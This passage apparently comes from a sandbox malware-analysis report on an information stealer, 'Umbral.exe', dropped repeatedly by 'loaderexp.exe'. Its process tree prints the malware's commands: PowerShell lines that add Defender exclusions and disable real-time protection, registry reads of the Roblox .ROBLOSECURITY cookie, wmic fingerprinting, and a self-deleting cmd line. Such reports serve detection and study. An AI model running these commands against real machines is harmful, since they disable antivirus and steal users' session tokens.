        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        44⤵
        
        PID:752
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        45⤵
        
        PID:2344
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        45⤵
        Views/modifies file attributes
        
        PID:2068
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2552
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:732
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        45⤵
        
        PID:1348
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        45⤵
        
        PID:2352
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        45⤵
        
        PID:2968
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        45⤵
        
        PID:2872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1940
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        45⤵
        Detects videocard installed
        
        PID:2268
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        45⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2280
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        46⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1824
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        43⤵
        
        PID:1688
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        43⤵
        
        PID:2256
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        42⤵
        
        PID:1584
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        42⤵
        
        PID:2900
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        41⤵
        
        PID:736
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        41⤵
        
        PID:2092
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        40⤵
        
        PID:1088
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        40⤵
        
        PID:888
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        39⤵
        
        PID:2444
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        39⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1084
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        40⤵
        
        PID:2808
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        40⤵
        Views/modifies file attributes
        
        PID:1608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        40⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        40⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        40⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2360
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        40⤵
        
        PID:2080
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        40⤵
        
        PID:2968
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        40⤵
        
        PID:2580
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        40⤵
        
        PID:2008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        40⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1976
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        40⤵
        Detects videocard installed
        
        PID:1828
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        40⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3028
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        41⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2516
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        38⤵
        
        PID:1584
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        38⤵
        
        PID:1072
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        37⤵
        
        PID:3052
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        37⤵
        
        PID:328
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        36⤵
        
        PID:1580
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        36⤵
        
        PID:784
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        35⤵
        
        PID:2640
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        35⤵
        Drops file in Drivers directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:1528
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        36⤵
        
        PID:2076
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        36⤵
        Views/modifies file attributes
        
        PID:2644
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        36⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2516
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        36⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        36⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        36⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1672
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        36⤵
        
        PID:3048
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        36⤵
        
        PID:2768
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        36⤵
        
        PID:2480
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        36⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2180
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        36⤵
        Detects videocard installed
        
        PID:1676
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        36⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1784
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        37⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1748
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        34⤵
        
        PID:1936
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        34⤵
        
        PID:1172
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        33⤵
        Executes dropped EXE
        
        PID:2796
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        33⤵
        Executes dropped EXE
        
        PID:3024
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        32⤵
        Executes dropped EXE
        
        PID:868
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        32⤵
        Executes dropped EXE
        
        PID:2588
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        31⤵
        Executes dropped EXE
        
        PID:1928
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        31⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2464
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        32⤵
        
        PID:1604
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        32⤵
        Views/modifies file attributes
        
        PID:2444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        32⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:480
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        32⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        32⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2480
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        32⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2460
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        32⤵
        
        PID:904
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        32⤵
        
        PID:2108
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        32⤵
        
        PID:3016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        32⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2440
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        32⤵
        Detects videocard installed
        
        PID:3056
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        32⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1480
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        33⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3036
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        30⤵
        Executes dropped EXE
        
        PID:572
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        30⤵
        Executes dropped EXE
        
        PID:108
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        29⤵
        Executes dropped EXE
        
        PID:1180
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        29⤵
        Executes dropped EXE
        
        PID:2632
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        28⤵
        Executes dropped EXE
        
        PID:2140
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        28⤵
        Executes dropped EXE
        
        PID:2852
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        27⤵
        Executes dropped EXE
        
        PID:3032
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        27⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2976
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        28⤵
        
        PID:2396
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        28⤵
        Views/modifies file attributes
        
        PID:1580
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        28⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1664
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        28⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1324
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        28⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        28⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1700
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        28⤵
        
        PID:3016
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        28⤵
        
        PID:2068
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        28⤵
        
        PID:552
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        28⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1592
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        28⤵
        Detects videocard installed
        
        PID:1156
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        28⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1996
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        29⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:732
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        26⤵
        Executes dropped EXE
        
        PID:3008
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        26⤵
        Executes dropped EXE
        
        PID:2248
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        25⤵
        Executes dropped EXE
        
        PID:2296
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        25⤵
        Executes dropped EXE
        
        PID:2016
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        24⤵
        Executes dropped EXE
        
        PID:1004
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        24⤵
        Executes dropped EXE
        
        PID:2844
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        23⤵
        Executes dropped EXE
        
        PID:1520
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        23⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2236
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        24⤵
        
        PID:2532
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        24⤵
        Views/modifies file attributes
        
        PID:612
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        24⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        24⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2896
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        24⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2816
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        24⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3068
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        24⤵
        
        PID:108
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        24⤵
        
        PID:2400
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        24⤵
        
        PID:1356
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        24⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:916
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        24⤵
        Detects videocard installed
        
        PID:2052
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        24⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1532
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        25⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2536
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        22⤵
        Executes dropped EXE
        
        PID:2300
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        22⤵
        Executes dropped EXE
        
        PID:2328
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        21⤵
        Executes dropped EXE
        
        PID:2080
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        21⤵
        Executes dropped EXE
        
        PID:2380
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        20⤵
        Executes dropped EXE
        
        PID:2876
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        20⤵
        Executes dropped EXE
        
        PID:880
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        19⤵
        Executes dropped EXE
        
        PID:932
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        19⤵
        Executes dropped EXE
        
        PID:320
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        18⤵
        Executes dropped EXE
        
        PID:536
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        18⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:876
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        19⤵
        
        PID:1672
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        19⤵
        Views/modifies file attributes
        
        PID:908
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        19⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1708
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        19⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2180
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        19⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        19⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2344
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        19⤵
        
        PID:916
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        19⤵
        
        PID:2956
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        19⤵
        
        PID:2448
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        19⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:736
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        19⤵
        Detects videocard installed
        
        PID:2912
        
        C:\Windows\system32\cmd.exe
        
